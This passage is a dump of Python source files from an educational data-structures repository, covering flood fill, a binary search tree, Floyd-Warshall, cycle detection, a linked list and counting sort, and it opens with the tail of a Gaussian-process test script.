gp = create_GP(1, 2, 'Matern52', 2.0, 1.0, 0.0)
gp.create_model(X, Y, noise_var, noise_prior='fixed')
gp.optimize()
X_pred = np.linspace(1.,5.,10).reshape((-1,1))
mean, cov = gp.predict_f(X_pred)
print(mean)
#print(cov)
'''
###
# GP Classification test
###
X = np.arange(1,6).reshape((5,1))
Y = np.array([1.0, 1.0, 1.0, 0.0, 0.0]).reshape((5,1))
gpc = GPyWrapper_Classifier()
gpc.create_kernel(1, 'RBF', 1.0, 1.0)
gpc.create_model(X, Y)
X_pred = np.linspace(1.,5.,10).reshape((-1,1))
print(gpc.predict_prob(X_pred))
print(gpc.model)
gpc.optimize()
print(gpc.predict_prob(X_pred))
print(gpc.model)
'''
if __name__ == '__main__':
main()
``` |
{
"source": "josephhlwang/DataStructsAlgo",
"score": 3
} |
#### File: DataStructsAlgo/Algos/flood_fill.py
```python
def flood_fill_dfs(mat, x, y, rep):
# flood fill algo fills the target val at x,y and all nearby target val to replacement val
# it can use dfs or bfs traversal
# possible movements
ROW = (0, 0, 1, -1)
COL = (1, -1, 0, 0)
    # invalid cases: empty matrix, out-of-range start, or no-op fill
    if not mat or not len(mat) or not is_valid(mat, x, y):
        return
    # get target val
    targ = mat[x][y]
    if targ == rep:
        return
stack = [(x, y)]
# run dfs traversal to replace vals
while stack:
# get cur pos
i, j = stack.pop()
mat[i][j] = rep
# add possible movements from cur pos
for k in range(4):
next_x = i + ROW[k]
next_y = j + COL[k]
# only add if movement valid and is target val
if is_valid(mat, next_x, next_y) and mat[next_x][next_y] == targ:
stack.append((next_x, next_y))
def flood_fill_bfs(mat, x, y, rep):
# possible movements
ROW = (0, 0, 1, -1)
COL = (1, -1, 0, 0)
    # invalid cases: empty matrix, out-of-range start, or no-op fill
    if not mat or not len(mat) or not is_valid(mat, x, y):
        return
    # get target val
    targ = mat[x][y]
    if targ == rep:
        return
queue = [(x, y)]
# run bfs traversal to replace vals
while queue:
# get cur pos
i, j = queue.pop(0)
mat[i][j] = rep
# add possible movements from cur pos
for k in range(4):
next_x = i + ROW[k]
next_y = j + COL[k]
# only add if movement valid and is target val
if is_valid(mat, next_x, next_y) and mat[next_x][next_y] == targ:
queue.append((next_x, next_y))
# check if pos valid
def is_valid(mat, x, y):
return 0 <= x < len(mat) and 0 <= y < len(mat[0])
# mat = [
# ["Y", "Y", "Y", "G", "G", "G", "G", "G", "G", "G"],
# ["Y", "Y", "Y", "Y", "Y", "Y", "G", "X", "X", "X"],
# ["G", "G", "G", "G", "G", "G", "G", "X", "X", "X"],
# ["W", "W", "W", "W", "W", "G", "G", "G", "G", "X"],
# ["W", "R", "R", "R", "R", "R", "G", "X", "X", "X"],
# ["W", "W", "W", "R", "R", "G", "G", "X", "X", "X"],
# ["W", "B", "W", "R", "R", "R", "R", "R", "R", "X"],
# ["W", "B", "B", "B", "B", "R", "R", "X", "X", "X"],
# ["W", "B", "B", "X", "B", "B", "B", "B", "X", "X"],
# ["W", "B", "B", "X", "X", "X", "X", "X", "X", "X"],
# ]
# mat2 = [
# ["Y", "Y", "Y", "G", "G", "G", "G", "G", "G", "G"],
# ["Y", "Y", "Y", "Y", "Y", "Y", "G", "X", "X", "X"],
# ["G", "G", "G", "G", "G", "G", "G", "X", "X", "X"],
# ["W", "W", "W", "W", "W", "G", "G", "G", "G", "X"],
# ["W", "R", "R", "R", "R", "R", "G", "X", "X", "X"],
# ["W", "W", "W", "R", "R", "G", "G", "X", "X", "X"],
# ["W", "B", "W", "R", "R", "R", "R", "R", "R", "X"],
# ["W", "B", "B", "B", "B", "R", "R", "X", "X", "X"],
# ["W", "B", "B", "X", "B", "B", "B", "B", "X", "X"],
# ["W", "B", "B", "X", "X", "X", "X", "X", "X", "X"],
# ]
# x = 3
# y = 9
# replacement = "C"
# flood_fill_dfs(mat, x, y, replacement)
# flood_fill_bfs(mat2, x, y, replacement)
# for arr in mat:
# print(arr)
```
#### File: DataStructsAlgo/BST/bst.py
```python
from node import Node
class BST:
# BST contains a Node object as head
# Nodes val >= Nodes left childs val; Nodes val < Nodes right childs val; Property recursively true
def __init__(self, head=None):
self.head = head
self.size = 1 if head else 0
def insert(self, val):
new_node = Node(val)
if self.is_empty():
# replace head
self.head = new_node
else:
# navigate to correct position
cur = self.head
while True:
# go left
if val <= cur.val:
if cur.left == None:
cur.left = new_node
break
cur = cur.left
# go right
else:
if cur.right == None:
cur.right = new_node
break
cur = cur.right
self.size += 1
def level_order(self):
if not self.is_empty():
# level order in trees same as BFS is graphs
# no need to keep visited since trees have no cycles
queue = [self.head]
tree = ""
# cur_level is number of nodes on current level, next_level same
cur_level, next_level = 1, 0
while queue:
cur = queue.pop(0)
tree += str(cur.val) + " "
cur_level -= 1
if cur.left:
queue.append(cur.left)
next_level += 1
if cur.right:
queue.append(cur.right)
next_level += 1
# current level of nodes done, go to next
if cur_level == 0:
cur_level, next_level = next_level, 0
tree += "\n"
return tree
return ""
def remove(self, val):
cur = self.head
# if node is head
if cur and cur.val == val:
# find replacement
rep = self._find_replacement(cur)
# replace children
if rep:
rep.left = cur.left
rep.right = cur.right
self.head = rep
self.size -= 1
# node is below head
elif cur:
# keep track of parent, navigate to val
par = cur
# cur one level down from par
if val < cur.val:
cur = cur.left
else:
cur = cur.right
while cur:
if val == cur.val:
# find replacement
rep = self._find_replacement(cur)
# replacement from right child
# check if cur is leaf
if rep:
rep.left = cur.left
rep.right = cur.right
# check which side cur is, replace cur with rep
if par.left and par.left.val == val:
par.left = rep
elif par.right and par.right.val == val:
par.right = rep
self.size -= 1
break
# navigate to side with cur
else:
if val < cur.val:
cur = cur.left
else:
cur = cur.right
if val < par.val:
par = par.left
else:
par = par.right
def _find_replacement(self, node):
# return None if node is leaf
rep = None
# right node exists, find replacement here
if node.right:
# keep track of par
par = node.right
# go to leftest node of par
cur = par.left
if cur == None:
# par is leftest node, return it
# unlink par from node
node.right = par.right
rep = par
else:
# navigate to leftest node
while cur.left:
cur = cur.left
par = par.left
# replace par left child with cur right child
par.left = cur.right
rep = cur
rep.right = None
print("here", node.right.val)
# find replacement left
elif node.left:
# keep track of par
par = node.left
# go to rightest node of par
cur = par.right
if cur == None:
# par is rightest node, return it
# unlink par from node
node.left = par.left
rep = par
else:
# navigate to rightest node
while cur.right:
cur = cur.right
par = par.right
# replace par right child with cur left child
par.right = cur.left
rep = cur
rep.left = None
return rep
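    # _find_replacement returns the in-order successor (leftmost node of the
    # right subtree) when a right child exists, otherwise the in-order
    # predecessor; either choice preserves the BST ordering invariant.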
def find(self, val):
cur = self.head
while cur:
if cur.val == val:
return True
elif val < cur.val:
cur = cur.left
else:
cur = cur.right
return False
def is_empty(self):
return self.size == 0
# n = Node(4)
# t = BST(n)
# t.insert(2)
# t.insert(6)
# t.insert(1)
# t.insert(3)
# t.insert(5)
# t.insert(7)
# print("size", t.size)
# print(t.level_order())
# t.remove(4)
# print(t.level_order())
# print("size", t.size)
# print(t.find(5))
n = Node(-4)
t = BST(n)
t.insert(-1)
t.insert(0)
t.insert(2)
t.remove(-1)
print(t.level_order())
```
#### File: DataStructsAlgo/Graph/floyd_warshall_minpaths.py
```python
from Graph.graph import Graph
# floyd warshall algo uses dynamic programming to find shortest paths from all nodes to all nodes
# if mid dist matrix diag contains negative, then graph contains negative cycles
def floyd_warshall(graph):
# init shortest distance adjacency matrix
adj = graph.get_adj_matrix()
n = graph.size
min_dist = [[float("inf")] * n for i in range(n)]
# set self distance to 0
for i in range(n):
min_dist[i][i] = 0
# copy edges from graph adjacency matrix
for i in range(n):
for j in range(n):
if adj[i][j] != -1:
min_dist[i][j] = adj[i][j]
# k is a pivot vertex
# i and j are vertices we are trying to find the shortest path for
# for each pivot
for k in range(n):
for i in range(n):
for j in range(n):
d = min_dist[i][k] + min_dist[k][j]
# if using that pivot is shorter than the edge
if d < min_dist[i][j]:
# update the shortest dist for i,j
min_dist[i][j] = d
# print results
for i in range(n):
for j in range(n):
if i != j:
d = min_dist[i][j]
if d != float("inf"):
print(f"Min path from {i} to {j} is {d}")
g = Graph()
g.add_vertex(0)
g.add_vertex(1)
g.add_vertex(2)
g.add_vertex(3)
g.add_vertex(4)
g.add_vertex(5)
g.add_vertex(6)
g.add_edge(0, 1, 7)
g.add_edge(0, 3, 5)
g.add_edge(1, 2, 8)
g.add_edge(1, 3, 9)
g.add_edge(1, 4, 7)
g.add_edge(2, 4, 5)
g.add_edge(3, 4, 5)
g.add_edge(3, 5, 6)
g.add_edge(4, 5, 8)
g.add_edge(4, 6, 9)
# print(g)
# print(g.get_edges())
# print(g.get_adj_matrix())
floyd_warshall(g)
```
#### File: DataStructsAlgo/LinkedList/floyds_cycle.py
```python
from node import Node
def floyds(head):
fast = slow = head
while fast and fast.next:
fast = fast.next.next
slow = slow.next
if fast == slow:
return True
return False
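# Why this works (classic tortoise-and-hare argument): once both pointers are
# inside a cycle, fast gains one node on slow per step, so they must meet;
# without a cycle, fast simply runs off the end and the loop exits.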
# n = Node(0)
# n1 = Node(1)
# n2 = Node(2)
# n3 = Node(3)
# n4 = Node(4)
# n.next = n1
# n1.next = n2
# n2.next = n3
# n3.next = n4
# print(floyds(n))
```
#### File: DataStructsAlgo/LinkedList/linked_list.py
```python
from node import Node
class LinkedList:
def __init__(self, head=None):
self.length = 1 if head else 0
self.head = head
def is_empty(self):
return self.length == 0
def insert(self, val, index=None):
if index == None:
index = self.length
# cannot insert outside of current length
if index > self.length:
print("Invalid index.")
else:
new_node = Node(val)
if index == 0:
# no head
if self.is_empty():
self.head = new_node
# replace head, join old head with new head
else:
temp = self.head
self.head = new_node
self.head.next = temp
# replace kth index, navigate to its parent, the k-1th index
else:
cur = self.head
count = 0
while count < index - 1:
count += 1
cur = cur.next
temp = cur.next
cur.next = new_node
new_node.next = temp
self.length += 1
def __str__(self):
li = ""
cur = self.head
while cur:
li += str(cur.val) + " > "
cur = cur.next
return li[:-3]
def find(self, val):
if not self.is_empty():
cur = self.head
index = 0
# linear search
while cur:
if val == cur.val:
return index
cur = cur.next
index += 1
return -1
def remove(self, index):
if index >= self.length:
print("Invalid index.")
else:
# if head, replace with next node
if index == 0:
self.head = self.head.next
# navigate to the k-1 element, remove kth element
else:
cur = self.head
count = 0
while count < index - 1:
                    count += 1
cur = cur.next
# remove by replacing kth element with k+1th element
temp = cur.next.next
cur.next = temp
self.length -= 1
# head = Node(6)
# ll = LinkedList()
# print(ll.is_empty())
# ll.insert(7, 0)
# ll.insert(8, 1)
# ll.insert(9, 2)
# ll.insert(8.5, 2)
# print(ll.length)
# print(ll)
# print(ll.find(8.5))
# ll.remove(1)
# print(ll.length)
# print(ll)
```
#### File: DataStructsAlgo/Sort/counting_sort.py
```python
def counting_sort(list, max):
# create arr of max+1 indices, fill arr with how many times each index comes up in list-to-be-sorted
# replace and sort list-to-be-sorted by iteration through arr
index = [0] * (max + 1)
for num in list:
index[num] += 1
count = 0
for i, num in enumerate(index):
for j in range(num):
list[count] = i
count += 1
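# Counting sort runs in O(n + k) time and O(k) extra space, where k = max;
# it pays off only when the value range is small relative to n, e.g.
# data = [5, 2, 4, 1, 3]; counting_sort(data, 5)  # data -> [1, 2, 3, 4, 5]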
list = [5, 2, 4, 1, 3]
counting_sort(list, 6)
print(list)
``` |